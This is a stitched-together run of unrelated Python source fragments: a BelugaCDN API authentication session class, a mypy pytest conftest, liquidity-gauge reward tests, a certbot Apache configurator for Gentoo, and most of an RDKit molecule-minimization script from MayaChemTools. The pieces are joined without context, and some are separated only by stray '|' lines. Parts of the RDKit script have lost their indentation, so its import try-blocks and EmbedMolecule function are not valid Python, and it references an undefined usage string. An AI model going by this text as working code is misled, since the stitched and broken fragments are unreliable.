        InvalidCredentials: when neither a complete token pair nor a
            complete username/password pair is provided.
    """
    def __init__(self, token_id=None, token_secret=None, username=None,
                 password=None):
        super(BelugaAPIAuth, self).__init__()
        if not (token_id and token_secret) and not (username and password):
            raise InvalidCredentials('Either token ID + token secret OR '
                                     'username + password is required.')
        self.token_id = token_id
        self.token_secret = token_secret
        self.username = username
        self.password = password
    def __call__(self, r):
        if self.token_id and self.token_secret:
            url = parse.urlparse(r.url)
            if url.query:
                path_qs = '%s?%s' % (url.path, url.query)
            else:
                path_qs = url.path
            date = datetime.datetime.utcnow().isoformat()
            # Sign method, path(+query) and timestamp; for requests with a
            # payload the body digest is appended to the signed string.
            parts = [r.method, path_qs, date]
            if r.method in ['POST', 'PUT']:
                # Fix: r.body may be None (no payload) or a str; sha512()
                # requires bytes, so normalize before hashing instead of
                # raising TypeError.
                body = r.body if r.body is not None else b''
                if isinstance(body, six.text_type):
                    body = body.encode('utf-8')
                parts.append(hashlib.sha512(body).hexdigest())
            sign_string = ':'.join(parts)
            signed_hmac = hmac.new(self.token_secret.encode(),
                                   sign_string.encode(),
                                   hashlib.sha512).hexdigest()
            r.headers.update({
                'Authorization': 'Token %s %s' % (self.token_id, signed_hmac),
                'Date': date,
            })
        else:
            # Basic auth: base64("user:pass") decoded back to text for the header.
            b64_auth = six.text_type(base64.b64encode(('%s:%s' % (
                self.username, self.password)).encode()), 'utf-8')
            r.headers['Authorization'] = 'Basic %s' % b64_auth
        return r
class BelugaAPI(Session):
    """Requests Session preconfigured for the BelugaCDN API.

    Relative request paths are resolved against ``base_url``; every
    request carries the package's User-Agent and an Accept header.
    """
    def __init__(self, token_id=None, token_secret=None, username=None,
                 password=None, base_url=None, accept=None):
        super(BelugaAPI, self).__init__()
        self.base_url = base_url if base_url else 'https://api.belugacdn.com'
        self.auth = BelugaAPIAuth(token_id, token_secret, username, password)
        self.headers = {
            'User-Agent': 'beluga_py/%s (+%s)' % (__version__, repo_url),
            'Accept': accept if accept else 'application/json',
        }
    def request(self, method, url, *args, **kwargs):
        # A URL without a scheme is treated as a path under base_url.
        if not parse.urlparse(url).scheme:
            url = '%s/%s' % (self.base_url.rstrip('/'), url.lstrip('/'))
        return super(BelugaAPI, self).request(method, url, *args, **kwargs)
|
from .throttling import rate_limit
from . import logging
from . import in_inline
|
import os.path
# Expose mypy's own test-data pytest plugin to this test run.
pytest_plugins = [
    'mypy.test.data',
]
def pytest_configure(config):
    """Ensure the test session runs from the mypy source root directory."""
    source_root = os.path.dirname(os.path.abspath(__file__))
    if os.getcwd() == source_root:
        return
    os.chdir(source_root)
# This function name is special to pytest. See
# http://doc.pytest.org/en/latest/writing_plugins.html#initialization-command-line-and-configuration-hooks
def pytest_addoption(parser) -> None:
    """Register the --bench flag used to enable benchmark test runs."""
    parser.addoption(
        '--bench',
        action='store_true',
        default=False,
        help='Enable the benchmark test runs',
    )
|
REWARD = 10 ** 20  # Total reward tokens funded into the reward contract.
WEEK = 7 * 86400  # One week in seconds (the full reward period).
LP_AMOUNT = 10 ** 18  # LP-token deposit amount (1 token at 18 decimals).
def test_claim_no_deposit(accounts, chain, liquidity_gauge_reward, reward_contract, coin_reward):
    """A user who never deposited LP tokens should receive no rewards."""
    funder = {'from': accounts[0]}
    claimant = {'from': accounts[1]}
    # Mint the reward supply and make it claimable via the reward contract.
    coin_reward._mint_for_testing(REWARD, funder)
    coin_reward.transfer(reward_contract, REWARD, funder)
    reward_contract.notifyRewardAmount(REWARD, funder)
    # Let the full reward period elapse, then claim with zero stake.
    chain.sleep(WEEK)
    liquidity_gauge_reward.claim_rewards(claimant)
    assert coin_reward.balanceOf(accounts[1]) == 0
def test_claim_no_rewards(accounts, chain, liquidity_gauge_reward, mock_lp_token,
                          reward_contract, coin_reward):
    """Depositing and withdrawing with an unfunded gauge yields no rewards."""
    funder = {'from': accounts[0]}
    depositor = {'from': accounts[1]}
    # Stake LP tokens in the gauge without funding any rewards.
    mock_lp_token.transfer(accounts[1], LP_AMOUNT, funder)
    mock_lp_token.approve(liquidity_gauge_reward, LP_AMOUNT, depositor)
    liquidity_gauge_reward.deposit(LP_AMOUNT, depositor)
    # Wait a full week, exit the position, then attempt a claim.
    chain.sleep(WEEK)
    liquidity_gauge_reward.withdraw(LP_AMOUNT, depositor)
    liquidity_gauge_reward.claim_rewards(depositor)
    assert coin_reward.balanceOf(accounts[1]) == 0
""" Distribution specific override class for Gentoo Linux """
import pkg_resources
import zope.interface
from certbot import interfaces
from certbot_apache import apache_util
from certbot_apache import configurator
from certbot_apache import parser
@zope.interface.provider(interfaces.IPluginFactory)
class GentooConfigurator(configurator.ApacheConfigurator):
    """Gentoo specific ApacheConfigurator override class"""

    # Gentoo's Apache filesystem layout and control commands.
    OS_DEFAULTS = {
        "server_root": "/etc/apache2",
        "vhost_root": "/etc/apache2/vhosts.d",
        "vhost_files": "*.conf",
        "logs_root": "/var/log/apache2",
        "version_cmd": ['/usr/sbin/apache2', '-v'],
        "apache_cmd": "apache2ctl",
        "restart_cmd": ['apache2ctl', 'graceful'],
        "conftest_cmd": ['apache2ctl', 'configtest'],
        # Gentoo has no a2enmod/a2ensite equivalents.
        "enmod": None,
        "dismod": None,
        "le_vhost_ext": "-le-ssl.conf",
        "handle_mods": False,
        "handle_sites": False,
        "challenge_location": "/etc/apache2/vhosts.d",
        "MOD_SSL_CONF_SRC": pkg_resources.resource_filename(
            "certbot_apache", "options-ssl-apache.conf"),
    }

    def get_parser(self):
        """Initializes the ApacheParser"""
        return GentooParser(
            self.aug, self.conf("server-root"), self.conf("vhost-root"),
            self.version, configurator=self)
class GentooParser(parser.ApacheParser):
    """Gentoo specific ApacheParser override class"""
    def __init__(self, *args, **kwargs):
        # Gentoo specific configuration file for Apache2: OpenRC keeps the
        # CLI defines (APACHE2_OPTS) in /etc/conf.d rather than a sysconfig file.
        self.apacheconfig_filep = "/etc/conf.d/apache2"
        super(GentooParser, self).__init__(*args, **kwargs)

    def update_runtime_variables(self):
        """ Override for update_runtime_variables for custom parsing """
        self.parse_sysconfig_var()

    def parse_sysconfig_var(self):
        """ Parses Apache CLI options from Gentoo configuration file """
        defines = apache_util.parse_define_file(self.apacheconfig_filep,
                                                "APACHE2_OPTS")
        # Idiomatic bulk merge instead of copying key-by-key in a loop.
        self.variables.update(defines)
|
#!/bin/env python
#
# File: RDKitPerformMinimization.py
# Author: Manish Sud <msud@san.rr.com>
#
# Copyright (C) 2020 Manish Sud. All rights reserved.
#
# The functionality available in this script is implemented using RDKit, an
# open source toolkit for cheminformatics developed by Greg Landrum.
#
# This file is part of MayaChemTools.
#
# MayaChemTools is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 3 of the License, or (at your option) any
# later version.
#
# MayaChemTools is distributed in the hope that it will be useful, but without
# any warranty; without even the implied warranty of merchantability of fitness
# for a particular purpose. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with MayaChemTools; if not, see <http://www.gnu.org/licenses/> or
# write to the Free Software Foundation Inc., 59 Temple Place, Suite 330,
# Boston, MA, 02111-1307, USA.
#
from __future__ import print_function
# Add local python path to the global path and import standard library modules...
import os
import sys; sys.path.insert(0, os.path.join(os.path.dirname(sys.argv[0]), "..", "lib", "Python"))
import time
import re
import multiprocessing as mp
# RDKit imports...
try:
from rdkit import rdBase
from rdkit import Chem
from rdkit.Chem import AllChem
except ImportError as ErrMsg:
sys.stderr.write("\nFailed to import RDKit module/package: %s\n" % ErrMsg)
sys.stderr.write("Check/update your RDKit environment and try again.\n\n")
sys.exit(1)
# MayaChemTools imports...
try:
from docopt import docopt
import MiscUtil
import RDKitUtil
except ImportError as ErrMsg:
sys.stderr.write("\nFailed to import MayaChemTools module/package: %s\n" % ErrMsg)
sys.stderr.write("Check/update your MayaChemTools environment and try again.\n\n")
sys.exit(1)
ScriptName = os.path.basename(sys.argv[0])  # Name used in status messages.
Options = {}  # Raw docopt command-line options (populated by RetrieveOptions).
OptionsInfo = {}  # Processed/validated option values (populated by ProcessOptions).
def main():
    """Top-level driver: parse options, run minimization, report timing."""
    MiscUtil.PrintInfo("\n%s (RDK v%s; %s): Starting...\n" % (ScriptName, rdBase.rdkitVersion, time.asctime()))
    StartWallClock, StartProcessor = MiscUtil.GetWallClockAndProcessorTime()
    # Command line: retrieve raw options, then validate/normalize them.
    RetrieveOptions()
    ProcessOptions()
    # Do the real work.
    PerformMinimization()
    MiscUtil.PrintInfo("\n%s: Done...\n" % ScriptName)
    MiscUtil.PrintInfo("Total time: %s" % MiscUtil.GetFormattedElapsedTime(StartWallClock, StartProcessor))
def PerformMinimization():
    """Read input molecules, minimize them, and write the results.

    All file names and parameters come from the global OptionsInfo;
    summary counts are printed when processing completes.
    """
    # Setup a molecule reader...
    MiscUtil.PrintInfo("\nProcessing file %s..." % OptionsInfo["Infile"])
    Mols = RDKitUtil.ReadMolecules(OptionsInfo["Infile"], **OptionsInfo["InfileParams"])
    # Set up a molecule writer...
    Writer = RDKitUtil.MoleculesWriter(OptionsInfo["Outfile"], **OptionsInfo["OutfileParams"])
    if Writer is None:
        MiscUtil.PrintError("Failed to setup a writer for output fie %s " % OptionsInfo["Outfile"])
    MiscUtil.PrintInfo("Generating file %s..." % OptionsInfo["Outfile"])
    # Dispatches to the serial or multiprocessing pipeline based on options.
    MolCount, ValidMolCount, MinimizationFailedCount, WriteFailedCount = ProcessMolecules(Mols, Writer)
    if Writer is not None:
        Writer.close()
    MiscUtil.PrintInfo("\nTotal number of molecules: %d" % MolCount)
    MiscUtil.PrintInfo("Number of valid molecules: %d" % ValidMolCount)
    MiscUtil.PrintInfo("Number of molecules failed during conformation generation or minimization: %d" % MinimizationFailedCount)
    MiscUtil.PrintInfo("Number of molecules failed during writing: %d" % WriteFailedCount)
    MiscUtil.PrintInfo("Number of ignored molecules: %d" % (MolCount - ValidMolCount + MinimizationFailedCount + WriteFailedCount))
def ProcessMolecules(Mols, Writer):
    """Dispatch minimization to the serial or multiprocessing pipeline.

    Returns the (MolCount, ValidMolCount, MinimizationFailedCount,
    WriteFailedCount) tuple produced by the selected pipeline.
    """
    if not OptionsInfo["MPMode"]:
        return ProcessMoleculesUsingSingleProcess(Mols, Writer)
    return ProcessMoleculesUsingMultipleProcesses(Mols, Writer)
def ProcessMoleculesUsingSingleProcess(Mols, Writer):
    """Process and minimize molecules serially in this process.

    Returns (MolCount, ValidMolCount, MinimizationFailedCount,
    WriteFailedCount).
    """
    if OptionsInfo["SkipConformerGeneration"]:
        MiscUtil.PrintInfo("\nPerforming minimization without generation of conformers...")
    else:
        MiscUtil.PrintInfo("\nPerforming minimization with generation of conformers...")
    (MolCount, ValidMolCount, MinimizationFailedCount, WriteFailedCount) = [0] * 4
    for Mol in Mols:
        MolCount += 1
        # The reader yields None for records it could not parse.
        if Mol is None:
            continue
        if RDKitUtil.IsMolEmpty(Mol):
            if not OptionsInfo["QuietMode"]:
                MolName = RDKitUtil.GetMolName(Mol, MolCount)
                MiscUtil.PrintWarning("Ignoring empty molecule: %s" % MolName)
            continue
        ValidMolCount += 1
        Mol, CalcStatus, ConfID, Energy = MinimizeMoleculeOrConformers(Mol, MolCount)
        if not CalcStatus:
            MinimizationFailedCount += 1
            continue
        WriteStatus = WriteMolecule(Writer, Mol, MolCount, ConfID, Energy)
        if not WriteStatus:
            WriteFailedCount += 1
    return (MolCount, ValidMolCount, MinimizationFailedCount, WriteFailedCount)
def ProcessMoleculesUsingMultipleProcesses(Mols, Writer):
    """Process and minimize molecules across a multiprocessing pool.

    Molecules are base64-encoded for transport to workers; results are
    decoded and written here in the parent process. Returns (MolCount,
    ValidMolCount, MinimizationFailedCount, WriteFailedCount).
    """
    if OptionsInfo["SkipConformerGeneration"]:
        MiscUtil.PrintInfo("\nPerforming minimization without generation of conformers using multiprocessing...")
    else:
        MiscUtil.PrintInfo("\nPerforming minimization with generation of conformers using multiprocessing...")
    MPParams = OptionsInfo["MPParams"]
    # Setup data for initializing a worker process...
    # Options/OptionsInfo are module globals, so each worker re-creates them
    # from these encoded snapshots in InitializeWorkerProcess.
    InitializeWorkerProcessArgs = (MiscUtil.ObjectToBase64EncodedString(Options), MiscUtil.ObjectToBase64EncodedString(OptionsInfo))
    # Setup a encoded mols data iterable for a worker process...
    WorkerProcessDataIterable = RDKitUtil.GenerateBase64EncodedMolStrings(Mols)
    # Setup process pool along with data initialization for each process...
    MiscUtil.PrintInfo("\nConfiguring multiprocessing using %s method..." % ("mp.Pool.imap()" if re.match("^Lazy$", MPParams["InputDataMode"], re.I) else "mp.Pool.map()"))
    MiscUtil.PrintInfo("NumProcesses: %s; InputDataMode: %s; ChunkSize: %s\n" % (MPParams["NumProcesses"], MPParams["InputDataMode"], ("automatic" if MPParams["ChunkSize"] is None else MPParams["ChunkSize"])))
    ProcessPool = mp.Pool(MPParams["NumProcesses"], InitializeWorkerProcess, InitializeWorkerProcessArgs)
    # Start processing...
    # Lazy mode streams input via imap(); InMemory mode loads it all via map().
    if re.match("^Lazy$", MPParams["InputDataMode"], re.I):
        Results = ProcessPool.imap(WorkerProcess, WorkerProcessDataIterable, MPParams["ChunkSize"])
    elif re.match("^InMemory$", MPParams["InputDataMode"], re.I):
        Results = ProcessPool.map(WorkerProcess, WorkerProcessDataIterable, MPParams["ChunkSize"])
    else:
        MiscUtil.PrintError("The value, %s, specified for \"--inputDataMode\" is not supported." % (MPParams["InputDataMode"]))
    (MolCount, ValidMolCount, MinimizationFailedCount, WriteFailedCount) = [0] * 4
    for Result in Results:
        MolCount += 1
        MolIndex, EncodedMol, CalcStatus, ConfID, Energy = Result
        # None signals an unparsable or empty molecule skipped by the worker.
        if EncodedMol is None:
            continue
        ValidMolCount += 1
        if not CalcStatus:
            MinimizationFailedCount += 1
            continue
        Mol = RDKitUtil.MolFromBase64EncodedMolString(EncodedMol)
        WriteStatus = WriteMolecule(Writer, Mol, MolCount, ConfID, Energy)
        if not WriteStatus:
            WriteFailedCount += 1
    return (MolCount, ValidMolCount, MinimizationFailedCount, WriteFailedCount)
def InitializeWorkerProcess(*EncodedArgs):
    """Install per-process copies of the global option data in a worker."""
    global Options, OptionsInfo
    MiscUtil.PrintInfo("Starting process (PID: %s)..." % os.getpid())
    # Decode Options and OptionInfo...
    EncodedOptions, EncodedOptionsInfo = EncodedArgs[0], EncodedArgs[1]
    Options = MiscUtil.ObjectFromBase64EncodedString(EncodedOptions)
    OptionsInfo = MiscUtil.ObjectFromBase64EncodedString(EncodedOptionsInfo)
def WorkerProcess(EncodedMolInfo):
    """Minimize a single encoded molecule inside a worker process.

    Takes a (MolIndex, EncodedMol) pair and returns a [MolIndex,
    EncodedMol, CalcStatus, ConfID, Energy] list; EncodedMol is None for
    unparsable or empty molecules.
    """
    MolIndex, EncodedMol = EncodedMolInfo
    CalcStatus = False
    ConfID = None
    Energy = None
    if EncodedMol is None:
        return [MolIndex, None, CalcStatus, ConfID, Energy]
    Mol = RDKitUtil.MolFromBase64EncodedMolString(EncodedMol)
    if RDKitUtil.IsMolEmpty(Mol):
        if not OptionsInfo["QuietMode"]:
            # MolIndex is zero-based; messages use one-based numbering.
            MolName = RDKitUtil.GetMolName(Mol, (MolIndex + 1))
            MiscUtil.PrintWarning("Ignoring empty molecule: %s" % MolName)
        return [MolIndex, None, CalcStatus, ConfID, Energy]
    Mol, CalcStatus, ConfID, Energy = MinimizeMoleculeOrConformers(Mol, (MolIndex + 1))
    # Pickle molecule properties too so the energy tag survives transport.
    return [MolIndex, RDKitUtil.MolToBase64EncodedMolString(Mol, PropertyPickleFlags = Chem.PropertyPickleOptions.MolProps | Chem.PropertyPickleOptions.PrivateProps), CalcStatus, ConfID, Energy]
def MinimizeMoleculeOrConformers(Mol, MolNum = None):
    """Route to plain minimization or conformer generation + minimization.

    Returns (Mol, CalcStatus, ConfID, Energy); ConfID is None when
    conformer generation is skipped.
    """
    if OptionsInfo["SkipConformerGeneration"]:
        Mol, CalcStatus, Energy = MinimizeMolecule(Mol, MolNum)
        return (Mol, CalcStatus, None, Energy)
    return MinimizeConformers(Mol, MolNum)
def MinimizeMolecule(Mol, MolNum = None):
    """Minimize an existing 3D structure with the configured forcefield.

    Returns (Mol, CalcStatus, Energy); Energy is a formatted string or
    None. On minimization failure returns (Mol, False, None).
    """
    if OptionsInfo["AddHydrogens"]:
        Mol = Chem.AddHs(Mol, addCoords = True)
    Status = 0
    try:
        if OptionsInfo["UseUFF"]:
            Status = AllChem.UFFOptimizeMolecule(Mol, maxIters = OptionsInfo["MaxIters"])
        elif OptionsInfo["UseMMFF"]:
            Status = AllChem.MMFFOptimizeMolecule(Mol, maxIters = OptionsInfo["MaxIters"], mmffVariant = OptionsInfo["MMFFVariant"])
        else:
            MiscUtil.PrintError("Minimization couldn't be performed: Specified forcefield, %s, is not supported" % OptionsInfo["ForceField"])
    except (ValueError, RuntimeError, Chem.rdchem.KekulizeException) as ErrMsg:
        if not OptionsInfo["QuietMode"]:
            MolName = RDKitUtil.GetMolName(Mol, MolNum)
            MiscUtil.PrintWarning("Minimization couldn't be performed for molecule %s:\n%s\n" % (MolName, ErrMsg))
        return (Mol, False, None)
    # Non-zero status means the optimizer hit maxIters without converging;
    # the molecule is still written, only a warning is emitted.
    if Status != 0:
        if not OptionsInfo["QuietMode"]:
            MolName = RDKitUtil.GetMolName(Mol, MolNum)
            MiscUtil.PrintWarning("Minimization failed to converge for molecule %s in %d steps. Try using higher value for \"--maxIters\" option...\n" % (MolName, OptionsInfo["MaxIters"]))
    Energy = None
    if OptionsInfo["EnergyOut"]:
        EnergyStatus, Energy = GetEnergy(Mol)
        if EnergyStatus:
            Energy = "%.2f" % Energy
        else:
            if not OptionsInfo["QuietMode"]:
                MolName = RDKitUtil.GetMolName(Mol, MolNum)
                MiscUtil.PrintWarning("Failed to retrieve calculated energy for molecule %s. Try again after removing any salts or cleaing up the molecule...\n" % (MolName))
    if OptionsInfo["RemoveHydrogens"]:
        Mol = Chem.RemoveHs(Mol)
    return (Mol, True, Energy)
def MinimizeConformers(Mol, MolNum = None):
    """Generate and minimize conformers; keep the lowest-energy one.

    Embeds up to MaxConfs conformers, minimizes each with the configured
    forcefield, and returns (Mol, CalcStatus, MinEnergyConfID, Energy).
    On failure returns (Mol, False, None, None).
    """
    if OptionsInfo["AddHydrogens"]:
        Mol = Chem.AddHs(Mol)
    ConfIDs = EmbedMolecule(Mol, MolNum)
    if not len(ConfIDs):
        if not OptionsInfo["QuietMode"]:
            MolName = RDKitUtil.GetMolName(Mol, MolNum)
            MiscUtil.PrintWarning("Minimization couldn't be performed for molecule %s: Embedding failed...\n" % MolName)
        return (Mol, False, None, None)
    # Energies for every conformer, keyed by conformer ID.
    CalcEnergyMap = {}
    for ConfID in ConfIDs:
        try:
            if OptionsInfo["UseUFF"]:
                Status = AllChem.UFFOptimizeMolecule(Mol, confId = ConfID, maxIters = OptionsInfo["MaxIters"])
            elif OptionsInfo["UseMMFF"]:
                Status = AllChem.MMFFOptimizeMolecule(Mol, confId = ConfID, maxIters = OptionsInfo["MaxIters"], mmffVariant = OptionsInfo["MMFFVariant"])
            else:
                MiscUtil.PrintError("Minimization couldn't be performed: Specified forcefield, %s, is not supported" % OptionsInfo["ForceField"])
        except (ValueError, RuntimeError, Chem.rdchem.KekulizeException) as ErrMsg:
            if not OptionsInfo["QuietMode"]:
                MolName = RDKitUtil.GetMolName(Mol, MolNum)
                MiscUtil.PrintWarning("Minimization couldn't be performed for molecule %s:\n%s\n" % (MolName, ErrMsg))
            return (Mol, False, None, None)
        # Energy is always needed here to pick the lowest-energy conformer,
        # regardless of the --energyOut setting.
        EnergyStatus, Energy = GetEnergy(Mol, ConfID)
        if not EnergyStatus:
            if not OptionsInfo["QuietMode"]:
                MolName = RDKitUtil.GetMolName(Mol, MolNum)
                MiscUtil.PrintWarning("Failed to retrieve calculated energy for conformation number %d of molecule %s. Try again after removing any salts or cleaing up the molecule...\n" % (ConfID, MolName))
            return (Mol, False, None, None)
        # Non-convergence only warns; the conformer still participates.
        if Status != 0:
            if not OptionsInfo["QuietMode"]:
                MolName = RDKitUtil.GetMolName(Mol, MolNum)
                MiscUtil.PrintWarning("Minimization failed to converge for conformation number %d of molecule %s in %d steps. Try using higher value for \"--maxIters\" option...\n" % (ConfID, MolName, OptionsInfo["MaxIters"]))
        CalcEnergyMap[ConfID] = Energy
    SortedConfIDs = sorted(ConfIDs, key = lambda ConfID: CalcEnergyMap[ConfID])
    MinEnergyConfID = SortedConfIDs[0]
    if OptionsInfo["RemoveHydrogens"]:
        Mol = Chem.RemoveHs(Mol)
    Energy = "%.2f" % CalcEnergyMap[MinEnergyConfID] if OptionsInfo["EnergyOut"] else None
    return (Mol, True, MinEnergyConfID, Energy)
def GetEnergy(Mol, ConfID = None):
    """Calculate the forcefield energy of a molecule/conformer.

    Returns (Status, Energy); Status is False when the forcefield could
    not be constructed for the molecule. ConfID of None means the
    default conformer (-1).
    """
    Status = True
    Energy = None
    if ConfID is None:
        ConfID = -1
    if OptionsInfo["UseUFF"]:
        UFFMoleculeForcefield = AllChem.UFFGetMoleculeForceField(Mol, confId = ConfID)
        if UFFMoleculeForcefield is None:
            Status = False
        else:
            Energy = UFFMoleculeForcefield.CalcEnergy()
    elif OptionsInfo["UseMMFF"]:
        # MMFF needs per-molecule properties before a forcefield can be built.
        MMFFMoleculeProperties = AllChem.MMFFGetMoleculeProperties(Mol, mmffVariant = OptionsInfo["MMFFVariant"])
        MMFFMoleculeForcefield = AllChem.MMFFGetMoleculeForceField(Mol, MMFFMoleculeProperties, confId = ConfID)
        if MMFFMoleculeForcefield is None:
            Status = False
        else:
            Energy = MMFFMoleculeForcefield.CalcEnergy()
    else:
        MiscUtil.PrintError("Couldn't retrieve conformer energy: Specified forcefield, %s, is not supported" % OptionsInfo["ForceField"])
    return (Status, Energy)
def EmbedMolecule(Mol, MolNum = None):
"Embed conformations"
ConfIDs = []
MaxConfs = OptionsInfo["MaxConfs"]
RandomSeed = OptionsInfo["RandomSeed"]
EnforceChirality = OptionsInfo["EnforceChirality"]
UseExpTorsionAnglePrefs = OptionsInfo["UseExpTorsionAnglePrefs"]
UseBasicKnowledge = OptionsInfo["UseBasicKnowledge"]
try:
ConfIDs = AllChem.EmbedMultipleConfs(Mol, numConfs = MaxConfs, randomSeed = RandomSeed, enforceChirality = EnforceChirality, useExpTorsionAnglePrefs = UseExpTorsionAnglePrefs, useBasicKnowledge = UseBasicKnowledge)
except ValueError as ErrMsg:
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, MolNum)
MiscUtil.PrintWarning("Embedding failed for molecule %s:\n%s\n" % (MolName, ErrMsg))
ConfIDs = []
return ConfIDs
def WriteMolecule(Writer, Mol, MolNum = None, ConfID = None, Energy = None):
    """Write a molecule, optionally tagged with its energy.

    Returns True on success, False when the writer raises.
    """
    if Energy is not None:
        Mol.SetProp(OptionsInfo["EnergyLabel"], Energy)
    try:
        WriteArgs = {} if ConfID is None else {"confId": ConfID}
        Writer.write(Mol, **WriteArgs)
    except (ValueError, RuntimeError) as ErrMsg:
        if not OptionsInfo["QuietMode"]:
            MolName = RDKitUtil.GetMolName(Mol, MolNum)
            MiscUtil.PrintWarning("Failed to write molecule %s:\n%s\n" % (MolName, ErrMsg))
        return False
    return True
def ProcessOptions():
    """Process and validate command line arguments and options.

    Populates the global OptionsInfo dictionary from the raw docopt
    Options; must run after RetrieveOptions().
    """
    MiscUtil.PrintInfo("Processing options...")
    # Validate options...
    ValidateOptions()
    # File handling options...
    OptionsInfo["Infile"] = Options["--infile"]
    OptionsInfo["InfileParams"] = MiscUtil.ProcessOptionInfileParameters("--infileParams", Options["--infileParams"], Options["--infile"])
    OptionsInfo["Outfile"] = Options["--outfile"]
    OptionsInfo["OutfileParams"] = MiscUtil.ProcessOptionOutfileParameters("--outfileParams", Options["--outfileParams"])
    OptionsInfo["Overwrite"] = Options["--overwrite"]
    OptionsInfo["AddHydrogens"] = True if re.match("^yes$", Options["--addHydrogens"], re.I) else False
    # Map the conformer generator choice onto RDKit embedding flags; a value
    # outside SDG/ETDG/KDG/ETKDG (i.e. "None") skips conformer generation.
    if re.match("^ETDG$", Options["--conformerGenerator"], re.I):
        ConformerGenerator = "ETDG"
        UseExpTorsionAnglePrefs = True
        UseBasicKnowledge = False
        SkipConformerGeneration = False
    elif re.match("^KDG$", Options["--conformerGenerator"], re.I):
        ConformerGenerator = "KDG"
        UseExpTorsionAnglePrefs = False
        UseBasicKnowledge = True
        SkipConformerGeneration = False
    elif re.match("^ETKDG$", Options["--conformerGenerator"], re.I):
        ConformerGenerator = "ETKDG"
        UseExpTorsionAnglePrefs = True
        UseBasicKnowledge = True
        SkipConformerGeneration = False
    elif re.match("^SDG$", Options["--conformerGenerator"], re.I):
        ConformerGenerator = "SDG"
        UseExpTorsionAnglePrefs = False
        UseBasicKnowledge = False
        SkipConformerGeneration = False
    else:
        ConformerGenerator = "None"
        UseExpTorsionAnglePrefs = False
        UseBasicKnowledge = False
        SkipConformerGeneration = True
    OptionsInfo["SkipConformerGeneration"] = SkipConformerGeneration
    OptionsInfo["ConformerGenerator"] = ConformerGenerator
    OptionsInfo["UseExpTorsionAnglePrefs"] = UseExpTorsionAnglePrefs
    OptionsInfo["UseBasicKnowledge"] = UseBasicKnowledge
    # Forcefield selection (UFF vs MMFF; validated earlier)...
    if re.match("^UFF$", Options["--forceField"], re.I):
        ForceField = "UFF"
        UseUFF = True
        UseMMFF = False
    elif re.match("^MMFF$", Options["--forceField"], re.I):
        ForceField = "MMFF"
        UseUFF = False
        UseMMFF = True
    else:
        MiscUtil.PrintError("The value, %s, specified for \"--forceField\" is not supported." % (Options["--forceField"],))
    MMFFVariant = "MMFF94" if re.match("^MMFF94$", Options["--forceFieldMMFFVariant"], re.I) else "MMFF94s"
    OptionsInfo["ForceField"] = ForceField
    OptionsInfo["MMFFVariant"] = MMFFVariant
    OptionsInfo["UseMMFF"] = UseMMFF
    OptionsInfo["UseUFF"] = UseUFF
    OptionsInfo["EnergyOut"] = True if re.match("^yes$", Options["--energyOut"], re.I) else False
    # SD property label under which the energy value is written.
    if UseMMFF:
        OptionsInfo["EnergyLabel"] = "%s_Energy" % MMFFVariant
    else:
        OptionsInfo["EnergyLabel"] = "%s_Energy" % ForceField
    OptionsInfo["EnforceChirality"] = True if re.match("^yes$", Options["--enforceChirality"], re.I) else False
    OptionsInfo["MaxIters"] = int(Options["--maxIters"])
    OptionsInfo["MaxConfs"] = int(Options["--maxConfs"])
    # Multiprocessing configuration...
    OptionsInfo["MPMode"] = True if re.match("^yes$", Options["--mp"], re.I) else False
    OptionsInfo["MPParams"] = MiscUtil.ProcessOptionMultiprocessingParameters("--mpParams", Options["--mpParams"])
    OptionsInfo["QuietMode"] = True if re.match("^yes$", Options["--quiet"], re.I) else False
    # -1 asks RDKit for a non-deterministic seed ("auto").
    RandomSeed = -1
    if not re.match("^auto$", Options["--randomSeed"], re.I):
        RandomSeed = int(Options["--randomSeed"])
    OptionsInfo["RandomSeed"] = RandomSeed
    OptionsInfo["RemoveHydrogens"] = True if re.match("^yes$", Options["--removeHydrogens"], re.I) else False
def RetrieveOptions():
    """Retrieve command line arguments and options via docopt.

    Populates the global Options dictionary, optionally changes the
    working directory, and exits after printing examples when the
    --examples flag is present.
    """
    # Get options...
    global Options
    Options = docopt(_docoptUsage_)
    # Set current working directory to the specified directory...
    WorkingDir = Options["--workingdir"]
    if WorkingDir:
        os.chdir(WorkingDir)
    # Handle examples option...
    if "--examples" in Options and Options["--examples"]:
        MiscUtil.PrintInfo(MiscUtil.GetExamplesTextFromDocOptText(_docoptUsage_))
        sys.exit(0)
def ValidateOptions():
    """Validate option values.

    Each MiscUtil validator prints an error and exits on invalid input,
    so reaching the end of this function implies all options are valid.
    """
    MiscUtil.ValidateOptionTextValue("-a, --addHydrogens", Options["--addHydrogens"], "yes no")
    MiscUtil.ValidateOptionTextValue("-c, --conformerGenerator", Options["--conformerGenerator"], "SDG ETDG KDG ETKDG None")
    MiscUtil.ValidateOptionTextValue("-f, --forceField", Options["--forceField"], "UFF MMFF")
    MiscUtil.ValidateOptionTextValue(" --forceFieldMMFFVariant", Options["--forceFieldMMFFVariant"], "MMFF94 MMFF94s")
    MiscUtil.ValidateOptionTextValue("--energyOut", Options["--energyOut"], "yes no")
    MiscUtil.ValidateOptionTextValue("--enforceChirality ", Options["--enforceChirality"], "yes no")
    # Input must exist and be a supported format; output must be SD and
    # must not silently clobber the input file.
    MiscUtil.ValidateOptionFilePath("-i, --infile", Options["--infile"])
    MiscUtil.ValidateOptionFileExt("-i, --infile", Options["--infile"], "sdf sd mol smi txt csv tsv")
    MiscUtil.ValidateOptionFileExt("-o, --outfile", Options["--outfile"], "sdf sd")
    MiscUtil.ValidateOptionsOutputFileOverwrite("-o, --outfile", Options["--outfile"], "--overwrite", Options["--overwrite"])
    MiscUtil.ValidateOptionsDistinctFileNames("-i, --infile", Options["--infile"], "-o, --outfile", Options["--outfile"])
    MiscUtil.ValidateOptionIntegerValue("--maxConfs", Options["--maxConfs"], {">": 0})
    MiscUtil.ValidateOptionIntegerValue("--maxIters", Options["--maxIters"], {">": 0})
    MiscUtil.ValidateOptionTextValue("--mp", Options["--mp"], "yes no")
    MiscUtil.ValidateOptionTextValue("-q, --quiet", Options["--quiet"], "yes no")
    # "auto" is allowed as-is; anything else must parse as an integer seed.
    if not re.match("^auto$", Options["--randomSeed"], re.I):
        MiscUtil.ValidateOptionIntegerValue("--randomSeed", Options["--randomSeed"], {})
    MiscUtil.ValidateOptionTextValue("-r, --removeHydrogens", Options["--removeHydrogens"], "yes no")
